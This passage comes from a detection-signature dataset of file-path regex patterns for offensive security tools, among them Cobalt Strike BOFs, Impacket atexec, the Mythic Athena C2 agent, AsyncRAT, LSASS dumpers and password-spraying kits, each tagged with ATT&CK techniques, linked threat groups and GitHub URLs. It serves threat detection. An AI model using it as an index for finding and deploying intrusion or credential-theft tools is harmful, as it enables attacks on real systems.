Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice 
Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/mlcsec/ASRenum-BOF","1","1","N/A","N/A","10","10","153","17","2024-03-01T14:03:44Z","2022-12-28T14:41:02Z","5420" "*/ASRenum.cs*",".{0,1000}\/ASRenum\.cs.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF that identifies Attack Surface Reduction (ASR) rules, actions, and exclusion locations","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - 
Sandworm","C2","https://github.com/mlcsec/ASRenum-BOF","1","1","N/A","N/A","10","10","153","17","2024-03-01T14:03:44Z","2022-12-28T14:41:02Z","5421" "*/ASRenum-BOF*",".{0,1000}\/ASRenum\-BOF.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF that identifies Attack Surface Reduction (ASR) rules, actions, and exclusion locations","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/mlcsec/ASRenum-BOF","1","1","N/A","N/A","10","10","153","17","2024-03-01T14:03:44Z","2022-12-28T14:41:02Z","5422" "*/ASREPRoast*",".{0,1000}\/ASREPRoast.{0,1000}","offensive_tool_keyword","ASREPRoast","Project that retrieves 
crackable hashes from KRB5 AS-REP responses for users without kerberoast preauthentication enabled. ","T1558.003","TA0006","N/A","N/A","Credential Access","https://github.com/HarmJ0y/ASREPRoast","1","1","N/A","N/A","N/A","3","202","58","2018-09-25T03:26:00Z","2017-01-14T21:07:57Z","5423" "*/asreproast_hashes_*.txt*",".{0,1000}\/asreproast_hashes_.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","5424" "*/ASREProastables.txt*",".{0,1000}\/ASREProastables\.txt.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","#linux","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","5425" "*/assets/bin2uuids_file.py*",".{0,1000}\/assets\/bin2uuids_file\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Shellcode Generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - 
T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/RCStep/CSSG","1","1","N/A","N/A","10","10","654","112","2025-01-08T23:11:49Z","2021-01-12T14:39:06Z","5426" "*/assets/wraith-scripts/*",".{0,1000}\/assets\/wraith\-scripts\/.{0,1000}","offensive_tool_keyword","wraith","A free and open-source, modular Remote Administration Tool (RAT) / Payload Dropper written in Go(lang) with a flexible command and control (C2) system.","T1059 - T1204 - T1105 - T1136 - T1021","TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/wraith-labs/wraith","1","1","N/A","N/A","10","10","223","49","2023-12-03T22:16:27Z","2020-01-23T17:09:23Z","5427" "*/AsStrongAsFuck.exe*",".{0,1000}\/AsStrongAsFuck\.exe.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","1","N/A","packer bundled","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","5430" "*/asstrongasfuck.py*",".{0,1000}\/asstrongasfuck\.py.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper 
letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","1","N/A","packer bundled","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","5431" "*/AsyncRAT-C%23*",".{0,1000}\/AsyncRAT\-C\%23.{0,1000}","offensive_tool_keyword","AsyncRAT-C-Sharp","Open-Source Remote Administration Tool For Windows C# (RAT)","T1021.002 - T1056.001 - T1113 - T1133 - T1041 - T1555 - T1129 - T1564.001","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009","N/A","TA2541 - APT-C-36 - Earth Berberoka - Operation Comando - TA558","C2","https://github.com/NYAN-x-CAT/AsyncRAT-C-Sharp","1","1","N/A","N/A","10","10","2484","754","2023-10-16T21:41:12Z","2019-01-19T04:02:26Z","5432" "*/AsyncRAT-C-Sharp*",".{0,1000}\/AsyncRAT\-C\-Sharp.{0,1000}","offensive_tool_keyword","AsyncRAT-C-Sharp","Open-Source Remote Administration Tool For Windows C# (RAT)","T1021.002 - T1056.001 - T1113 - T1133 - T1041 - T1555 - T1129 - T1564.001","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009","N/A","TA2541 - APT-C-36 - Earth Berberoka - Operation Comando - TA558","C2","https://github.com/NYAN-x-CAT/AsyncRAT-C-Sharp","1","1","N/A","N/A","10","10","2484","754","2023-10-16T21:41:12Z","2019-01-19T04:02:26Z","5433" "*/asyncssh_server.py*",".{0,1000}\/asyncssh_server\.py.{0,1000}","offensive_tool_keyword","MaccaroniC2","A proof-of-concept Command & Control framework that utilizes the powerful AsyncSSH Python library which provides an asynchronous client and server implementation of the SSHv2 protocol and use PyNgrok wrapper for ngrok integration.","T1090 - T1059.003","TA0011 - TA0002","N/A","N/A","C2","https://github.com/CalfCrusher/MaccaroniC2","1","1","N/A","N/A","10","10","76","16","2023-06-27T17:43:59Z","2023-05-21T13:33:48Z","5434" "*/atexec.py*",".{0,1000}\/atexec\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for 
working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","5435" "*/atexec.py*",".{0,1000}\/atexec\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","5436" "*/atexec-pro.git*",".{0,1000}\/atexec\-pro\.git.{0,1000}","offensive_tool_keyword","atexec-pro","Fileless atexec for lateral movement","T1021.002 - T1105","TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/Ridter/atexec-pro","1","1","N/A","N/A","10","4","366","45","2024-03-28T03:36:50Z","2024-03-27T09:15:00Z","5437" "*/atexec-pro.py*",".{0,1000}\/atexec\-pro\.py.{0,1000}","offensive_tool_keyword","atexec-pro","Fileless atexec for lateral movement","T1021.002 - T1105","TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/Ridter/atexec-pro","1","1","N/A","N/A","10","4","366","45","2024-03-28T03:36:50Z","2024-03-27T09:15:00Z","5438" "*/Athena-*.zip*",".{0,1000}\/Athena\-.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. 
Athena is designed for Mythic 2.2 and newer","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/Athena","1","1","N/A","N/A","10","10","198","40","2025-02-12T17:13:10Z","2022-01-24T20:44:38Z","5439" "*/Athena.csproj*",".{0,1000}\/Athena\.csproj.{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/Athena","1","1","N/A","N/A","10","10","198","40","2025-02-12T17:13:10Z","2022-01-24T20:44:38Z","5440" "*/Athena.exe*",".{0,1000}\/Athena\.exe.{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/Athena","1","1","N/A","N/A","10","10","198","40","2025-02-12T17:13:10Z","2022-01-24T20:44:38Z","5441" "*/Athena.Profiles.*.cs*",".{0,1000}\/Athena\.Profiles\..{0,1000}\.cs.{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. 
Athena is designed for Mythic 2.2 and newer","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/Athena","1","1","N/A","N/A","10","10","198","40","2025-02-12T17:13:10Z","2022-01-24T20:44:38Z","5442" "*/Athena.Profiles.*.exe*",".{0,1000}\/Athena\.Profiles\..{0,1000}\.exe.{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/Athena","1","1","N/A","N/A","10","10","198","40","2025-02-12T17:13:10Z","2022-01-24T20:44:38Z","5443" "*/Athena.Profiles.*.py*",".{0,1000}\/Athena\.Profiles\..{0,1000}\.py.{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/Athena","1","1","N/A","N/A","10","10","198","40","2025-02-12T17:13:10Z","2022-01-24T20:44:38Z","5444" "*/Athena.sln*",".{0,1000}\/Athena\.sln.{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. 
Athena is designed for Mythic 2.2 and newer","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/Athena","1","1","N/A","N/A","10","10","198","40","2025-02-12T17:13:10Z","2022-01-24T20:44:38Z","5445" "*/Athena/Assembly/*.*",".{0,1000}\/Athena\/Assembly\/.{0,1000}\..{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/Athena","1","1","N/A","N/A","10","10","198","40","2025-02-12T17:13:10Z","2022-01-24T20:44:38Z","5446" "*/Athena/Commands/*.*",".{0,1000}\/Athena\/Commands\/.{0,1000}\..{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/Athena","1","1","N/A","N/A","10","10","198","40","2025-02-12T17:13:10Z","2022-01-24T20:44:38Z","5447" "*/athena/mythic*",".{0,1000}\/athena\/mythic.{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. 
Athena is designed for Mythic 2.2 and newer","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/Athena","1","1","N/A","N/A","10","10","198","40","2025-02-12T17:13:10Z","2022-01-24T20:44:38Z","5448" "*/athena_utils/*.py*",".{0,1000}\/athena_utils\/.{0,1000}\.py.{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/Athena","1","1","N/A","N/A","10","10","198","40","2025-02-12T17:13:10Z","2022-01-24T20:44:38Z","5449" "*/AthenaPlugins/bin/*",".{0,1000}\/AthenaPlugins\/bin\/.{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/Athena","1","1","#linux","N/A","10","10","198","40","2025-02-12T17:13:10Z","2022-01-24T20:44:38Z","5450" "*/AthenaSMB/*",".{0,1000}\/AthenaSMB\/.{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. 
Athena is designed for Mythic 2.2 and newer","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/Athena","1","1","N/A","N/A","10","10","198","40","2025-02-12T17:13:10Z","2022-01-24T20:44:38Z","5451" "*/AthenaTests/*.*",".{0,1000}\/AthenaTests\/.{0,1000}\..{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/Athena","1","1","N/A","N/A","10","10","198","40","2025-02-12T17:13:10Z","2022-01-24T20:44:38Z","5452" "*/AtlasReaper.git*",".{0,1000}\/AtlasReaper\.git.{0,1000}","offensive_tool_keyword","AtlasReaper","A command-line tool for reconnaissance and targeted write operations on Confluence and Jira instances.","T1210.002 - T1078.003 - T1046","TA0001 - TA0007 - TA0040","N/A","N/A","Reconnaissance","https://github.com/werdhaihai/AtlasReaper","1","1","N/A","N/A","3","3","255","28","2023-09-14T23:50:33Z","2023-06-24T00:18:41Z","5453" "*/atomizer.py*",".{0,1000}\/atomizer\.py.{0,1000}","offensive_tool_keyword","SprayingToolkit","Scripts to make password spraying attacks against Lync/S4B, OWA & O365 a lot quicker, 
less painful and more efficient","T1110 - T1078 - T1133 - T1061 - T1621","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/byt3bl33d3r/SprayingToolkit","1","0","#linux","N/A","9","10","1491","269","2022-10-17T01:01:57Z","2018-09-13T09:52:11Z","5456" "*/AtomLdr.git*",".{0,1000}\/AtomLdr\.git.{0,1000}","offensive_tool_keyword","AtomLdr","A DLL loader with advanced evasive features","T1071.004 - T1574.001 - T1574.002 - T1071.001 - T1055.003 - T1059.003 - T1546.003 - T1574.003 - T1574.004 - T1059.001 - T1569.002","TA0011 - TA0006 - TA0002 - TA0008 - TA0007","N/A","N/A","Exploitation tool","https://github.com/NUL0x4C/AtomLdr","1","1","N/A","N/A","N/A","8","712","91","2023-02-26T19:57:09Z","2023-02-26T17:59:26Z","5457" "*/atomsilo.hta*",".{0,1000}\/atomsilo\.hta.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","5458" "*/ATPMiniDump.exe*",".{0,1000}\/ATPMiniDump\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","5459" "*/ATPMiniDump.git*",".{0,1000}\/ATPMiniDump\.git.{0,1000}","offensive_tool_keyword","ATPMiniDump","Dumping LSASS memory with MiniDumpWriteDump on 
PssCaptureSnapShot to evade WinDefender ATP credential-theft. Take a look at this blog post for details. ATPMiniDump was created starting from Outflank-Dumpert then big credits to @Cneelis","T1003 - T1005 - T1055 - T1218","TA0006 - TA0008 - TA0011","N/A","N/A","Credential Access","https://github.com/b4rtik/ATPMiniDump","1","1","N/A","N/A","N/A","3","255","46","2019-12-02T15:01:22Z","2019-11-29T19:49:54Z","5460" "*/attackercan/*",".{0,1000}\/attackercan\/.{0,1000}","offensive_tool_keyword","Github Username","github Penetration tester repo hosting malicious code","T1583 - T1595 - T1190","TA0001 - TA0002 - TA0008 - TA0011","N/A","N/A","Exploitation tool","https://github.com/attackercan/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","5461" "*/AttackerMITM.py*",".{0,1000}\/AttackerMITM\.py.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","1","#linux","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","5462" "*/attacks/*.py",".{0,1000}\/attacks\/.{0,1000}\.py","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","5463" "*/AttackServers/*",".{0,1000}\/AttackServers\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Rapid Attack Infrastructure (RAI)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - 
PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/obscuritylabs/RAI","1","1","N/A","N/A","10","10","304","53","2024-11-24T16:29:36Z","2018-02-12T16:23:23Z","5464" "*/AttackSurfaceMapper.git*",".{0,1000}\/AttackSurfaceMapper\.git.{0,1000}","offensive_tool_keyword","AttackSurfaceMapper","AttackSurfaceMapper (ASM) is a reconnaissance tool that uses a mixture of open source intelligence and active techniques to expand the attack surface of your target","T1595 - T1596","TA0043","N/A","N/A","Reconnaissance","https://github.com/superhedgy/AttackSurfaceMapper","1","1","N/A","N/A","6","10","1355","197","2024-04-08T16:13:24Z","2019-08-07T14:32:53Z","5465" "*/AtYourService.exe*",".{0,1000}\/AtYourService\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
